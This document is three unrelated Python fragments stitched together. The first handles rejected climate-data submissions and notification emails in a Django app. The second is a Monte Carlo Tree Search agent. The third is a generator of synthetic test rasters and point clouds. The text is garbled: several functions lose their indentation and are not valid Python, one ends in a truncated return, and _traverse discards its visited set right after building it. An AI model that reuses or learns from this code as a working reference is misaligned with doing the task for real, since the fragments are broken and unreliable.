        # concurrently, and also creates any missing parent directories
        os.makedirs(rejected_dir, exist_ok=True)
        shutil.move(submission_dir, rejected_dir)
    except (IOError, OSError):
        # best effort: report the failure and leave the submission in place
        msg = ("Unable to move the directory. Leaving it in its current "
               "location")
        logger.error(msg)
        return submission_dir
    submission_rejected_dir = os.path.join(
        rejected_dir, os.path.basename(os.path.abspath(submission_dir)))
    msg = 'Data submission moved to {}'.format(submission_rejected_dir)
    logger.error(msg)
    return submission_rejected_dir
def send_user_rejection_email(data_sub):
    """
    Send an email to the submission's creator warning them of validation
    failure.

    :param pdata_app.models.DataSubmission data_sub: The failed submission.
    """
    val_tool_url = ('http://proj.badc.rl.ac.uk/primavera-private/wiki/JASMIN/'
                    'HowTo#SoftwarepackagesinstalledonthePRIMAVERAworkspace')
    # The configured contact user is both the named contact and the signatory.
    contact_user = User.objects.get(
        username=Settings.get_solo().contact_user_id)
    contact_string = '{} {} ({})'.format(contact_user.first_name,
                                         contact_user.last_name,
                                         contact_user.email)
    template = (
        'Dear {first_name} {surname},\n'
        '\n'
        'Your data submission in {incoming_dir} has failed validation and '
        'has been moved to {rejected_dir}.\n'
        '\n'
        'Please run the validation tool ({val_tool_url}) to check why this '
        'submission failed validation. Once the data is passing validation '
        'then please resubmit the corrected data.\n'
        '\n'
        'Please contact {contact_person} if you '
        'have any questions.\n'
        '\n'
        'Thanks,\n'
        '\n'
        '{friendly_name}'
    )
    msg = template.format(
        first_name=data_sub.user.first_name,
        surname=data_sub.user.last_name,
        incoming_dir=data_sub.incoming_directory,
        rejected_dir=data_sub.directory,
        val_tool_url=val_tool_url,
        contact_person=contact_string,
        friendly_name=contact_user.first_name,
    )
    # Queue rather than send directly; a separate process drains EmailQueue.
    EmailQueue.objects.create(
        recipient=data_sub.user,
        subject='[PRIMAVERA_DMT] Data submission failed validation',
        message=msg)
def send_admin_rejection_email(data_sub):
    """
    Send the admin user an email warning them that a submission failed due to
    a server problem (missing data request, etc).

    :param pdata_app.models.DataSubmission data_sub: The failed submission.
    """
    admin_user = User.objects.get(
        username=Settings.get_solo().contact_user_id)
    body = (
        'Data submission {} from incoming directory {} failed validation due '
        'to a SubmissionError being raised. Please run the validation script '
        'manually on this submission and correct the error.\n'
        '\n'
        'Thanks,\n'
        '\n'
        '{}'.format(data_sub.id, data_sub.incoming_directory,
                    admin_user.first_name)
    )
    # Queue rather than send directly; a separate process drains EmailQueue.
    EmailQueue.objects.create(
        recipient=admin_user,
        subject=('[PRIMAVERA_DMT] Submission {} failed validation'.
                 format(data_sub.id)),
        message=body
    )
def set_status_rejected(data_sub, rejected_dir):
    """
    Set the data submission's status to be rejected and update the path to
    point to where the data now lives.

    :param pdata_app.models.DataSubmission data_sub: The data submission object.
    :param str rejected_dir: The name of the directory that the rejected files
        have been moved to.
    """
    data_sub.status = STATUS_VALUES['REJECTED']
    data_sub.directory = rejected_dir
    # persist both field changes to the database in a single save
    data_sub.save()
def add_tape_url(metadata, tape_base_url, submission_dir):
    """
    Add to each file's metadata its URL in the tape system. The URL is
    calculated by finding the file's path relative to the submission directory
    and appending this to the base URL.

    :param list metadata: a list of the dictionary objects corresponding to
        each file
    :param str tape_base_url: the top level url of the data in the tape system
    :param str submission_dir: the top-level directory of the submission
    """
    for file_dict in metadata:
        # tape URLs always use '/' separators, so join by hand rather than
        # with os.path.join
        relative_dir = os.path.relpath(file_dict['directory'], submission_dir)
        file_dict['tape_url'] = '{}/{}'.format(tape_base_url, relative_dir)
def run_prepare(file_paths, num_processes):
    """
    Run PrePARE on each file in the submission. Any failures are reported
    as an error with the logging and an exception is raised at the end of
    processing if one or more files has failed.

    :param list file_paths: The paths of the files in the submission's
        directory.
    :param int num_processes: The number of processes to use in parallel.
    :raises SubmissionError: at the end of checking if one or more files has
        failed PrePARE's checks.
    """
    logger.debug('Starting PrePARE on {} files'.format(len(file_paths)))
    jobs = []
    # Manager-backed queue/event so state is shared across worker processes.
    manager = Manager()
    params = manager.Queue()
    file_failed = manager.Event()
    if num_processes != 1:
        # Start the worker pool; each worker consumes paths from the queue.
        for i in range(num_processes):
            p = Process(target=_run_prepare, args=(params, file_failed))
            jobs.append(p)
            p.start()
    # Enqueue every file path followed by one None sentinel per worker so
    # that each worker knows when to stop (see _run_prepare).
    for item in itertools.chain(file_paths, (None,) * num_processes):
        params.put(item)
    if num_processes == 1:
        # Single-process mode runs the checks inline in this process.
        _run_prepare(params, file_failed)
    else:
        for j in jobs:
            j.join()
    # Any worker may have set the shared event on failure.
    if file_failed.is_set():
        logger.error('Not all files passed PrePARE')
        raise SubmissionError()
    logger.debug('All files successfully checked by PrePARE')
def _contents_hdf_check(cube, metadata, max_size=MAX_DATA_INTEGRITY_SIZE):
    """
    Check that the entire data of the file can be read into memory without
    any errors. Corrupt files typically generate an HDF error. Files larger
    than `max_size` are not read and a warning is displayed. Most files are
    under this limit, but those over are excessively slow to validate.

    :param iris.cube.Cube cube: The cube to check
    :param dict metadata: Metadata obtained from the file
    :param int max_size: Files larger than this (in bytes) are not checked
    :returns: True if file read ok.
    :raises FileValidationError: If there was any problem reading the data.
    """
    # Oversized files are skipped (treated as passing) with a warning.
    if os.path.getsize(os.path.join(metadata['directory'],
                                    metadata['basename'])) > max_size:
        logger.warning('File {} is larger than {} bytes. File contents '
                       'reading check not run.'.format(metadata['basename'],
                                                       max_size))
        return True
    try:
        # Touching cube.data forces the full file to be read into memory,
        # which is what surfaces HDF read errors from corrupt files.
        _data = cube.data
    except Exception:
        # Deliberately broad: the underlying I/O libraries can raise a
        # variety of exception types when the data is corrupt.
        msg = 'Unable to read data from file {}.'.format(metadata['basename'])
        raise FileValidationError(msg)
    else:
        return True
def _run_prepare(params, file_failed):
    """
    Check a single file with PrePARE. This function is called in parallel by
    multiprocessing.

    :param multiprocessing.Manager.Queue params: A queue, with each item being
        the full path of a file in the submission to check.
    :param multiprocessing.Manager.Event file_failed: If set then one or more
        files has failed validation.
    """
    while True:
        # A None item is the sentinel telling this worker to exit
        # (run_prepare enqueues one per worker).
        file_path = params.get()
        if file_path is None:
            return
        # Some variables are excluded from the PrePARE check entirely.
        skip_this_var = False
        for skip_var in SKIP_PREPARE_VARS:
            if skip_var in file_path:
                logger.debug('Skipping running PrePARE on {}'.
                             format(file_path))
                skip_this_var = True
                break
        if skip_this_var:
            continue
        # run_prepare.sh lives alongside this module.
        prepare_script = os.path.join(
            os.path.dirname(os.path.realpath(__file__)),
            'run_prepare.sh'
        )
        prep_res = subprocess.run([prepare_script, file_path],
                                  stdout=subprocess.PIPE)
        if prep_res.returncode:
            # A non-zero exit code marks the whole submission as failed via
            # the shared event; processing of other files continues.
            logger.error('File {} failed PrePARE\n{}'.
                         format(file_path, prep_res.stdout.decode('utf-8')))
            file_failed.set()
def _get_submission_object(submission_dir):
    """
    Look up the DataSubmission record for a submission directory.

    :param str submission_dir: The path of the submission's top level
        directory.
    :returns: The object corresponding to the submission.
    :rtype: pdata_app.models.DataSubmission
    :raises SubmissionError: if zero or more than one submission matches.
    """
    try:
        return DataSubmission.objects.get(incoming_directory=submission_dir)
    except django.core.exceptions.MultipleObjectsReturned:
        msg = 'Multiple DataSubmissions found for directory: {}'.format(
            submission_dir)
        logger.error(msg)
        raise SubmissionError(msg)
    except django.core.exceptions.ObjectDoesNotExist:
        msg = ('No DataSubmissions have been found in the database for '
               'directory: {}. Please create a submission through the web '
               'interface.'.format(submission_dir))
        logger.error(msg)
        raise SubmissionError(msg)
def _guess_plev_name(metadata):
    """
    Guess the name of the plev in the data request dimensions.

    :param dict metadata: The file's metadata dictionary.
    :returns: The name of the pressure levels from the data request or None
        if it can't be guessed.
    :rtype: str or None
    """
    rootgrp = Dataset(os.path.join(metadata['directory'],
                                   metadata['basename']))
    try:
        # Find the vertical-level dimension, preferring 'plev' over 'lev'.
        level_name = None
        for candidate in ('plev', 'lev'):
            if candidate in rootgrp.dimensions:
                level_name = candidate
                break
        if level_name is None:
            return None
        # Map the number of levels to the data request's plev name;
        # unknown counts give None.
        num_plevs = len(rootgrp.dimensions[level_name])
        return {4: 'plev4', 7: 'plev7h', 27: 'plev27'}.get(num_plevs)
    finally:
        # Fix: previously the dataset was only closed on the straight-line
        # path, leaking the file handle if reading the dimensions raised.
        rootgrp.close()
def _object_to_default(obj):
    """
    Convert known objects to a form that can be serialized by JSON
    """
    if isinstance(obj, iris.time.PartialDateTime):
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        kwargs = {}
        # Recover the constructor keyword arguments by parsing the repr,
        # e.g. PartialDateTime(year=2000, month=1) -> {'year': 2000, ...}.
        for k, v in re.findall(r'(\w+)=(\d+)', repr(obj)):
            kwargs[k] = int(v)
        obj_dict['__kwargs__'] = kwargs
        return obj_dict
    elif isinstance(obj, (ActivityId, ClimateModel, Experiment, Institute,
                          Project)):
        # These models are uniquely identified by their short_name.
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {'short_name': obj.short_name}
        return obj_dict
    elif isinstance(obj, VariableRequest):
        # Identified by the (table_name, cmor_name) pair.
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {'table_name': obj.table_name,
                                  'cmor_name': obj.cmor_name}
        return obj_dict
    elif isinstance(obj, DataRequest):
        # Serialize the related objects' identifying fields using Django's
        # double-underscore lookup notation so they can be queried back.
        obj_dict = {'__class__': obj.__class__.__name__,
                    '__module__': obj.__module__}
        obj_dict['__kwargs__'] = {
            'variable_request__table_name': obj.variable_request.table_name,
            'variable_request__cmor_name': obj.variable_request.cmor_name,
            'institute__short_name': obj.institute.short_name,
            'climate_model__short_name': obj.climate_model.short_name,
            'experiment__short_name': obj.experiment.short_name,
            'rip_code': obj.rip_code
        }
        return obj_dict
    # NOTE(review): any other type falls through and returns None implicitly,
    # so json.dump would emit null rather than raising TypeError - confirm
    # this is intended.
def _dict_to_object(dict_):
"""
Convert a dictionary to an object
"""
if '__class__' in dict_:
module = __import__(dict_['__module__'], fromlist=[dict_['__class__']])
klass = getattr(module, dict_['__class__'])
if dict_['__class__'] == 'PartialDateTime':
inst = klass(**dict_['__kwargs__'])
elif dict_['__class__'] in ('ActivityId', 'ClimateModel',
'Experiment', 'Institute', 'Project',
'VariableRequest', 'DataRequest'):
inst = match_one(klass, **dict_['__kwargs__'])
else:
msg = ('Cannot load from JSON files class {}'.
format(dict_['__class__']))
raise NotImplementedError(msg)
else:
inst = dict_
return | |
"""Monte Carlo Tree Search for stochastic environments."""
import asyncio
import random
import gin
import gym_open_ai
from alpaca.alpacka import data
from alpaca.alpacka.agents import base
from alpaca.alpacka.agents import core
@gin.configurable
def rate_new_leaves_with_rollouts(
    leaf,
    observation,
    model,
    discount,
    rollout_agent_class=core.RandomAgent,
    rollout_time_limit=100,
):
    """Basic rate_new_leaves_fn based on rollouts with an Agent.

    Args:
        leaf (TreeNode): Node whose children are to be rated.
        observation (np.ndarray): Observation received at leaf.
        model (gym.Env): Model environment.
        discount (float): Discount factor.
        rollout_agent_class (type): Agent class to use for rollouts.
        rollout_time_limit (int): Maximum number of timesteps for rollouts.

    Yields:
        Network prediction requests.

    Returns:
        list: List of pairs (reward, value) for all actions played from leaf.
    """
    del leaf
    agent = rollout_agent_class(model.action_space)
    # Remember the model state so every action's rollout starts from the
    # same point.
    init_state = model.clone_state()

    child_ratings = []
    for init_action in range(model.action_space.n):
        (observation, init_reward, done, _) = model.step(init_action)
        value = 0
        total_discount = 1
        time = 0
        # Roll out with the agent, accumulating the discounted return.
        while not done and time < rollout_time_limit:
            # agent.act is a coroutine - forward its network prediction
            # requests to our caller via yield from.
            (action, _) = yield from agent.act(observation)
            (observation, reward, done, _) = model.step(action)
            value += total_discount * reward
            total_discount *= discount
            time += 1
        child_ratings.append((init_reward, value))
        # Rewind the model before rating the next action.
        model.restore_state(init_state)
    return child_ratings
@gin.configurable
def rate_new_leaves_with_value_network(leaf, observation, model, discount):
    """rate_new_leaves_fn based on a value network (observation -> value)."""
    del leaf
    del observation
    init_state = model.clone_state()

    def step_and_rewind(action):
        # Step into one child, record the transition, then restore the model
        # so each action is evaluated from the same state.
        (observation, reward, done, _) = model.step(action)
        model.restore_state(init_state)
        return (observation, reward, done)

    # Batch the per-action transitions into stacked arrays.
    (observations, rewards, dones) = data.nested_stack([
        step_and_rewind(action) for action in range(model.action_space.n)
    ])
    # Run the network to predict values for children.
    values = yield observations
    # Compute the final ratings, masking out "done" states.
    return rewards + discount * values * (1 - dones)
class TreeNode:
    """Node of the search tree.

    Attrs:
        children (list): List of children, indexed by action.
        is_leaf (bool): Whether the node is a leaf, i.e. has not been expanded
            yet.
        is_terminal (bool): Whether the node is terminal, i.e. the environment
            returns "done" when stepping into this state. For now we assume
            that "done"s are deterministic.
            TODO(koz4k): Lift this assumption.
        graph_node (GraphNode): The corresponding graph node - many to one
            relation.
    """

    def __init__(self, init_reward, init_value=None):
        """Initializes TreeNode.

        Args:
            init_reward (float): Reward collected when stepping into the node
                the first time.
            init_value (float or None): Value received from a
                rate_new_leaves_fn for this node, or None if it's the root.
        """
        self._total_reward = init_reward
        self._n_rewards = 1
        self._leaf_value = init_value
        self._graph = None
        self.children = None
        self.is_terminal = False

    def init_graph_node(self, graph_node=None):
        """Assigns the node's GraphNode, or creates a new one."""
        assert self._graph is None, 'Graph node initialized twice.'
        if graph_node is None:
            graph_node = GraphNode(self._leaf_value)
        self._graph = graph_node

    @property
    def graph_node(self):
        return self._graph

    def visit(self, reward, value):
        """Records a visit in the node during backpropagation.

        Args:
            reward (float): Reward collected when stepping into the node.
            value (float or None): Value accumulated on the path out of the
                node, or None if value should not be accumulated.
        """
        self._total_reward += reward
        self._n_rewards += 1
        # Terminal nodes don't have GraphNodes assigned, so don't update value.
        if self.is_terminal or value is None:
            return
        assert self._graph is not None, 'Graph node must be assigned first.'
        self._graph.visit(value)

    def quality(self, discount):
        """Returns the quality of going into this node in the search tree.

        We use it instead of value, so we can handle dense rewards.
        Quality(s, a) = reward(s, a) + discount * value(s').
        """
        mean_reward = self._total_reward / self._n_rewards
        # Before a GraphNode is assigned, fall back to the initial rating.
        future = (
            self._graph.value if self._graph is not None else self._leaf_value
        )
        return mean_reward + discount * future

    @property
    def is_leaf(self):
        return self.children is None
class GraphNode:
    """Node of the search graph.

    In the graph mode, corresponds to a state in the MDP. Outside of the graph
    mode, corresponds 1-1 to a TreeNode.

    Attrs:
        value (float): Value accumulated in this node.
    """

    def __init__(self, init_value):
        """Initializes GraphNode.

        Args:
            init_value (float or None): Value received from a
                rate_new_leaves_fn for this node, or None if it's the root.
        """
        self._total_value = 0
        self._n_visits = 0
        if init_value is not None:
            self.visit(init_value)
        # TODO(koz4k): Move children here?

    def visit(self, value):
        """Records a visit in the node during backpropagation.

        Args:
            value (float): Value accumulated on the path out of the node.
        """
        self._total_value += value
        self._n_visits += 1

    @property
    def value(self):
        # Mean of all backed-up values (requires at least one visit).
        return self._total_value / self._n_visits
class DeadEnd(Exception):
    """Exception raised in case of a dead end.

    Dead end occurs when every action leads to a loop, i.e. action selection
    has filtered out all children as already visited on the current path.
    """
class StochasticMCTSAgent(base.OnlineAgent):
    """Monte Carlo Tree Search for stochastic environments.

    For now it also supports transpositions and loop avoidance for
    deterministic environments.
    TODO(koz4k): Merge those features with DeterministicMCTSAgent. Add features
    specific to stochastic environments to StochasticMCTSAgent.
    """
    def __init__(
        self,
        action_space,
        n_passes=10,
        discount=0.99,
        rate_new_leaves_fn=rate_new_leaves_with_rollouts,
        graph_mode=False,
        avoid_loops=False,
        loop_penalty=0,
    ):
        """Initializes MCTSAgent.

        Args:
            action_space (gym.Space): Action space.
            n_passes (int): Number of MCTS passes per act().
            discount (float): Discount factor.
            rate_new_leaves_fn (callable): Coroutine estimating rewards and
                values of new leaves. Can ask for predictions using a Network.
                Should return rewards and values for every child of a given leaf
                node. Signature:
                (leaf, observation, model, discount) -> [(reward, value)].
            graph_mode (bool): Turns on using transposition tables, turning the
                search graph from a tree to a DAG.
            avoid_loops (bool): Prevents going back to states already visited on
                the path from the root.
            loop_penalty (float): Value backpropagated from "dead ends" - nodes
                from which it's impossible to reach a node that hasn't already
                been visited.
        """
        assert isinstance(action_space, gym_open_ai.spaces.Discrete), (
            'MCTSAgent only works with Discrete action spaces.'
        )
        super().__init__(action_space)
        # Loop avoidance relies on graph nodes, which only exist in graph mode.
        if avoid_loops:
            assert graph_mode, 'Loop avoidance only works in graph mode.'
        self.n_passes = n_passes
        self._discount = discount
        self._rate_new_leaves = rate_new_leaves_fn
        self._graph_mode = graph_mode
        self._avoid_loops = avoid_loops
        self._loop_penalty = loop_penalty
        # Per-episode search state, populated later:
        self._model = None          # model environment used for simulation
        self._root = None           # root TreeNode of the current search tree
        self._root_state = None     # cloned model state at the root
        self._real_visited = None   # graph nodes visited in the real env
        # Transposition table: model state -> GraphNode (graph mode only).
        self._state_to_graph_node = {}
def _rate_children(self, node):
"""Returns qualities of all children of a given node."""
return [child.quality(self._discount) for child in node.children]
def _choose_action(self, node, visited):
"""Chooses the action to take in a given node based on child qualities.
If avoid_loops is turned on, tries to avoid nodes visited on the path
from the root.
Args:
node (TreeNode): Node to choose an action from.
visited (set): Set of GraphNodes visited on the path from the root.
Returns:
Action to take.
Raises:
DeadEnd: If there's no child not visited before.
"""
# TODO(koz4k): Distinguish exploratory/not.
child_qualities = self._rate_children(node)
child_qualities_and_actions = zip(
child_qualities, range(len(child_qualities))
)
if self._avoid_loops:
# Filter out nodes visited on the path from the root.
child_graph_nodes = [child.graph_node for child in node.children]
child_qualities_and_actions = [
(quality, action)
for (quality, action) in child_qualities_and_actions
if child_graph_nodes[action] not in visited
]
if not child_qualities_and_actions:
# No unvisited child - dead end.
raise DeadEnd
(_, action) = max(child_qualities_and_actions)
return action
def _traverse(self, root, observation, path):
"""Chooses a path from the root to a leaf in the search tree.
Does not modify the nodes.
Args:
root (TreeNode): Root of the search tree.
observation (np.ndarray): Observation received at root.
path (list): Empty list that will be filled with pairs
(reward, node) of nodes visited during traversal and rewards
collected when stepping into them. It is passed as an argument
rather than returned, so we can access the result in case of
a DeadEnd exception.
Returns:
Tuple (observation, done, visited), where observation is the
observation received in the leaf, done is the "done" flag received
when stepping into the leaf and visited is a set of GraphNodes
visited on the path. In case of a "done", traversal is interrupted.
"""
assert not path, 'Path accumulator should initially be empty.'
path.append((0, root))
visited = {root.graph_node}
node = root
done = False
visited = set()
while not node.is_leaf and not done:
action = self._choose_action(node, visited)
node = node.children[action]
(observation, reward, done, _) = self._model.step(action)
path.append((reward, node))
visited.add(node.graph_node)
return (observation, done, visited)
def _expand_leaf(self, leaf, observation, done, visited):
"""Expands a leaf and returns its quality.
The leaf's new children are assigned initial rewards and values. The
reward and value of the "best" new leaf is then backpropagated.
Only modifies leaf - assigns a GraphNode and adds children.
Args:
leaf (TreeNode): Leaf to expand.
observation (np.ndarray): Observation received at leaf.
done (bool): "Done" flag received | |
<gh_stars>0
#!/usr/bin/env python
from osgeo import gdal, osr
import numpy as np
from pointcloud2raster.raster import Raster
import os
import math
import csv
import random
import argparse
# this allows GDAL to throw Python Exceptions
"""
This file creates a bunch of rasters with interesting patterns that we can use for testing purposes
"""
proj = 'PROJCS["NAD_1983_2011_StatePlane_Arizona_Central_FIPS_0202",GEOGCS["GCS_NAD_1983_2011",DATUM["NAD_1983_2011",SPHEROID["GRS_1980",6378137.0,298.257222101]],PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433]],PROJECTION["Transverse_Mercator"],PARAMETER["false_easting",213360.0],PARAMETER["false_northing",0.0],PARAMETER["central_meridian",-111.9166666666667],PARAMETER["scale_factor",0.9999],PARAMETER["latitude_of_origin",31.0],UNIT["Meter",1.0]]'
def array2rastercsv(array, outName, templateRaster, yoffset=0, xoffset=0, DataType=gdal.GDT_Float32):
    """
    Write an array out as a GeoTiff plus matching .matrix, .csv and
    _cloud.csv point files.

    :param array: The array with data
    :param outName: The output name (no extension. Will be suffixed)
    :param templateRaster: Where to get metadata for the raster
    :param yoffset: offset added to the template's top edge coordinate
    :param xoffset: offset added to the template's left edge coordinate
    :param DataType: GDAL pixel data type for the output band
    :return:
    """
    rastername = outName + ".tif"
    matrixname = outName + ".matrix"
    # reversed_arr = array[::-1] # reverse array so the tif looks like the array
    cols = array.shape[1]
    rows = array.shape[0]
    originX = templateRaster.left + xoffset
    originY = templateRaster.top + yoffset

    # Write the GeoTiff using the template's cell size and the projection
    # string defined at the top of this file.
    driver = gdal.GetDriverByName('GTiff')
    outRaster = driver.Create(rastername, cols, rows, 1, DataType)
    outRaster.SetGeoTransform((originX, templateRaster.cellWidth, 0, originY, 0, templateRaster.cellHeight))
    outband = outRaster.GetRasterBand(1)
    outband.WriteArray(array)
    outband.SetNoDataValue(templateRaster.nodata)
    outRaster.SetProjection(proj)
    outband.FlushCache()

    # This array might be upside-down from GDAL's perspective
    newArr = array
    cw = templateRaster.cellWidth
    ch = templateRaster.cellHeight

    # Now write a grid.
    np.savetxt(matrixname, newArr, fmt='%.3f', delimiter=",")

    # Now save the same file as a CSV
    # NOTE(review): opening in 'wb' for csv.writer is Python 2 usage
    # (consistent with the print statements elsewhere in this file); under
    # Python 3 this would need open(csvname, 'w', newline='').
    csvname = outName + ".csv"
    with open(csvname, 'wb') as csvfile:
        spamwriter = csv.writer(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE)
        for idy, row in enumerate(newArr):
            for idx, cell in enumerate(row):
                # One "x y z" point per cell, positioned at the cell centre.
                left = idx * templateRaster.cellWidth + originX + (cw / 2)
                top = idy * templateRaster.cellHeight + originY + (ch / 2)
                spamwriter.writerow([left, top, cell])

    # The cloud CSV has randomized tesselation
    csvname = outName + "_cloud.csv"
    with open(csvname, 'wb') as csvfile:
        spamwriter = csv.writer(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE)
        for idy, row in enumerate(newArr):
            for idx, cell in enumerate(row):
                # 3-15 jittered points per cell with +/-0.2 value noise,
                # scattered uniformly within the cell.
                for pt in range(0, random.randint(3,15)):
                    val = cell + random.uniform(-0.2,0.2)
                    left = idx * templateRaster.cellWidth + originX + (cw / 2) + random.uniform( -cw / 2, cw / 2 )
                    top = idy * templateRaster.cellHeight + originY + (ch / 2) + random.uniform( -ch / 2, ch / 2 )
                    spamwriter.writerow([left, top, val])
def slopeyArray(width, height, high, low):
    """
    Creates a slopey array that slopes from high to low along the x axis

    :param width:
    :param height:
    :param high:
    :param low:
    :return:
    """
    high = float(high)
    low = float(low)
    # Build one row ramping from high towards low: column idx maps to
    # high - (high - low) * idx / (width - 1), exactly as the original
    # per-cell loop computed it. (The normalisation uses `width` although
    # the array has `height` columns; the two coincide for the square
    # grids this script generates.)
    ramp = high - (high - low) * (np.arange(height, dtype=float) / (width - 1))
    # Repeat the ramp for every row to get the (width, height) array.
    return np.tile(ramp, (width, 1))
def checkerBoardArray(width, height, high, low):
    """
    Creates a checkerboard pattern of alternating high/low squares,
    10 cells on a side.

    :param width:
    :param height:
    :param high:
    :param low:
    :return:
    """
    gridsize = 10  # side length (in cells) of each checker square
    high = float(high)
    low = float(low)
    array = np.empty((width, height))
    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            # Fix: use explicit floor division. The original `idx / gridsize`
            # relied on Python 2 integer division; under Python 3 it yields
            # floats and the alternating-square logic breaks. `//` keeps the
            # Python 2 behaviour while being correct on Python 3.
            switch = bool((idx // gridsize) % 2) != bool((idy // gridsize) % 2)
            array[idy][idx] = high if switch else low
    return array
def squareHillArray(width, height, high, low):
    """
    Create a nice square tooth function along the x axis: `high` on the outer
    thirds of the row, `low` on the middle third.

    :param width:
    :param height:
    :param high:
    :param low:
    :return:
    """
    high = float(high)
    low = float(low)
    # Fix: use true division for the third-points. The original
    # `float(width/3)` floored first under Python 2 integer division, which
    # the float() wrapper suggests was not intended.
    third = width / 3.0
    array = np.empty((width, height))
    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            val = low
            if idx < third or idx > third * 2:
                val = high
            array[idy][idx] = val
    return array
def sawtoothArray(width, height, high, low, phase = 0):
    """
    Really simple sawtooth function along the x axis, four periods across the
    array, using the standard form x/p - floor(1/2 + x/p).

    :param width:
    :param height:
    :param high:
    :param low:
    :param phase: currently unused
    :return:
    """
    high = float(high)
    low = float(low)
    array = np.empty((width, height))
    period = float(width) / 4
    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            # Fix: the literal `1/2` in the canonical sawtooth formula
            # evaluated to 0 under Python 2 integer division, shifting the
            # wave; write 0.5 as the formula intends.
            array[idy][idx] = low + (idx/period - math.floor(0.5 + idx/period)) * (high-low)
    return array
def doubleSawtoothArray(width, height, high, low, phase = 0):
    """
    Sawtooth function applied along both axes, keeping the maximum of the
    horizontal and vertical waves in each cell.

    :param width:
    :param height:
    :param high:
    :param low:
    :param phase: currently unused
    :return:
    """
    high = float(high)
    low = float(low)
    array = np.empty((width, height))
    period = float(width) / 4

    def _tooth(position):
        # One-dimensional sawtooth sample; see sawtoothArray.
        # Fix: 0.5 replaces the Python 2 integer-division literal `1/2`
        # (which evaluated to 0 and shifted the wave).
        return low + (position/period - math.floor(0.5 + position/period)) * (high-low)

    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            array[idy][idx] = max(_tooth(idx), _tooth(idy))
    return array
def sineArray(width, height, high, low, phase = 0):
    """
    A nice sine wave function oscillating between low and high along the x
    axis, with exactly one full cycle across the row.

    :param width:
    :param height:
    :param high:
    :param low:
    :param phase: angular offset added to each cell's angle
    :return:
    """
    high = float(high)
    low = float(low)
    last_col = width - 1
    # Midline of the wave; the sine term swings +/- (high - low) / 2 around it.
    mid = (high - low) / 2 + low
    array = np.empty((width, height))
    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            theta = (float(idx) / float(last_col) * (math.pi * 2)) + phase
            array[idy][idx] = mid + (math.sin(theta) * (high - low) / 2)
    return array
def tiltySlopeyArray(width, height, high, low, dir="N"):
    """
    Creates a slopey array that slopes from high to low along the x and y axis

    :param width:
    :param height:
    :param high:
    :param low:
    :param dir: compass direction of the slope: "N", "S", "E" or "W"
    :return:
    """
    high = float(high)
    low = float(low)
    array = np.empty((width, height))
    nWidth = width - 1
    nHeight = height - 1
    # Length and angle of the array's diagonal; each cell's value comes from
    # projecting its position vector onto the diagonal.
    diag = math.sqrt(float(width)**2 + float(height)**2)
    diagAngle = math.atan2(float(width), float(height))
    for idy, row in enumerate(array):
        for idx, cell in enumerate(row):
            # NOTE(review): `dir` shadows the builtin; any value other than
            # N/S/E/W leaves the whole array filled with NaN.
            val = np.nan
            if dir == "N":
                # Project distance from the top-left corner onto the diagonal.
                hypotenuse = math.sqrt(float(idx) ** 2 + float(idy) ** 2)
                theta = diagAngle - math.atan2(idy, idx)
                val = low + ((high - low) * hypotenuse * math.cos(theta) ) / diag
            elif dir == "S":
                # Same projection as "N" with the gradient reversed.
                hypotenuse = math.sqrt(float(idx) ** 2 + float(idy) ** 2)
                theta = diagAngle - math.atan2(idy, idx)
                val = high - ((high - low) * hypotenuse * math.cos(theta) ) / diag
            elif dir == "E":
                # Measure from the top-right corner instead.
                hypotenuse = math.sqrt(float(nWidth - idx) ** 2 + float(idy) ** 2)
                theta = diagAngle - math.atan2(idy, (nWidth - idx))
                val = low + ((high - low) * hypotenuse * math.cos(theta) ) / diag
            elif dir == "W":
                # Top-right corner projection with the gradient reversed.
                hypotenuse = math.sqrt(float(nWidth - idx) ** 2 + float(idy) ** 2)
                theta = diagAngle - math.atan2(idy, (nWidth - idx))
                val = high - ((high - low) * hypotenuse * math.cos(theta) ) / diag
            array[idy][idx] = val
    return array
def constArray(width,height,value):
    """
    Create a constant-value array with the given dimensions.

    :param width: number of cells
    :param height: number of cells
    :param value: constant value you want for this
    :return:
    """
    # np.full with an explicit float dtype matches the original
    # np.empty(...).fill(value), which always produced a float64 array.
    return np.full((width, height), value, dtype=float)
def main():
templateRaster = Raster('data/template.tif')
# Create rasters with the following parameters
max = 980
min = 950
pxwidth = 100
pxheight = 100
squaregrid = 3
spacing = 100
folder = 'data/rasters/'
try:
os.makedirs(folder)
except:
print "folder exists"
topoffset = (pxheight + spacing) * templateRaster.cellHeight
leftoffset = (pxwidth + spacing) * templateRaster.cellWidth
array2rastercsv(checkerBoardArray(pxwidth, pxheight, min, max), '{0}Checkerboard{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 900), folder + 'const900', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 950), folder + 'const950', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 970), folder + 'const970', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 980), folder + 'const980', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 990), folder + 'const990', templateRaster, topoffset, leftoffset)
array2rastercsv(slopeyArray(pxwidth, pxheight, max, min), '{0}Slopey{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(slopeyArray(pxwidth, pxheight, min, max), '{0}Slopey{1}-{2}'.format(folder, max, min), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "N"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "N"), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "E"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "E"), templateRaster, topoffset, leftoffset)
